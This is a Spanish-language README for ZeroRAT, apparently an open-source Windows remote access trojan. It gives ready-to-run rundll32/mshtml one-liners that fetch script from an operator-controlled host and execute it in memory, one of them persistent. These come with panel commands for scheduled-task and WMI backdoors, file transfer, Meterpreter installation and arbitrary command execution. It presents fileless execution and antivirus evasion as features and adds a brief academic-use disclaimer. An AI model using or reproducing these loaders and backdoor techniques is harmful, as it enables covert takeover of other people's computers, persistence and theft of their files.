
ZeroRAT es un control remoto de una sola línea para Windows.
#ZeroRAT ##Introducción Herramienta de control remoto (RAT) para Windows. El cliente solo necesita ejecutar una única instrucción; utiliza programas nativos de Windows para ejecutarse, no escribe archivos en el disco y cuenta con características naturales de evasión de antivirus. Deja de funcionar tras reiniciar.
En el programa, "download" y "upload" se refieren a la perspectiva del cliente. Cuando el cliente descarga un archivo desde el servidor se llama "download"; cuando el cliente sube un archivo al servidor se llama "upload".
##Configuración Modifica la dirección de conexión del cliente y la contraseña de administración del panel en config.py. Recuerda comprobar que la depuración (debug) esté desactivada.
El programa depende de Flask y sqlite3; instálalos tú mismo con pip.
##Cliente
Reemplaza <ip>:<port> por la dirección de conexión real.
Versión normal
rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();h=new%20ActiveXObject("WinHttp.WinHttpRequest.5.1");h.Open("GET","http://<ip>:<port>/connect",false);try{h.Send();B=h.ResponseText;eval(B);}catch(e){window.close();}
Versión persistente
rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();h=new%20ActiveXObject("WinHttp.WinHttpRequest.5.1");h.Open("GET","http://<ip>:<port>/connect",false);while(1){try{h.Send();B=h.ResponseText;eval(B);}catch(e){}}
##Servidor
Panel: http://<ip>:<port>/server/
Los comandos compatibles con el servidor son:
sessions Lista los clientes activosuse <id> Selecciona un cliente según su idset <key> <value> Establece variables globalesshow globals/downloads/uploads Muestra las variables globales, los archivos que el cliente puede descargar y los archivos subidos por el clientedelete session Elimina el cliente actualdelete download/upload <id> Elimina archivos según su idupfile Sube un archivo al servidor y lo añade a la lista de downloadsdownload Establece las variables download_file y download_save_path para que el cliente descargue el archivo y lo guarde en download_save_pathupload Establece la variable upload_file para que el cliente suba el archivo en upload_file al servidorbackdoor tasks <time> Deja una puerta trasera mediante el Programador de tareas de Windows; formato de hora: 00:00backdoor wmi Deja una puerta trasera mediante WMI; se ejecuta una vez cada horameterpreter shellcode Instala Meterpreter mediante shellcode con InstallUtil; primero debes establecer LHOST y LPORT (solo se pueden seguir recibiendo comandos después de migrar; depende de .NET Framework 2.0)meterpreter powershell Instala Meterpreter mediante PowerShell (depende de PowerShell 1.0)Excepto los comandos indicados anteriormente, todo lo demás se ejecutará como un comando del sistema de Windows.
Consulta los detalles de los comandos en /static/js/xkcd_cli.js
##Desarrollo Comandos del panel que gestionan el cliente: /static/js/xkcd_cli.js
Comandos del panel que gestionan el servidor: /controllers/server.py
Mantenimiento del cliente: /controllers/client.py
Generación del payload del cliente: payload.py
Operaciones relacionadas con la base de datos: /models/
##Contacto http://5alt.me
md5_salt [AT] qq.com
##Referencias https://gist.github.com/subTee/f1603fa5c15d5f8825c0
http://drops.wooyun.org/tips/11764
http://drops.wooyun.org/tips/8290
http://drops.wooyun.org/tips/12354
https://github.com/chromakode/xkcdfools
http://www.kammerl.de/ascii/AsciiSignature.php
https://github.com/AlessandroZ/LaZagne
##Descargo de responsabilidad Al usar esta herramienta, cumple con las leyes locales. Solo debe utilizarse con fines de prueba académica; está estrictamente prohibido controlar ilegalmente equipos ajenos. Si se causan daños, el autor no se hace responsable.
##License GPLV3
##TODO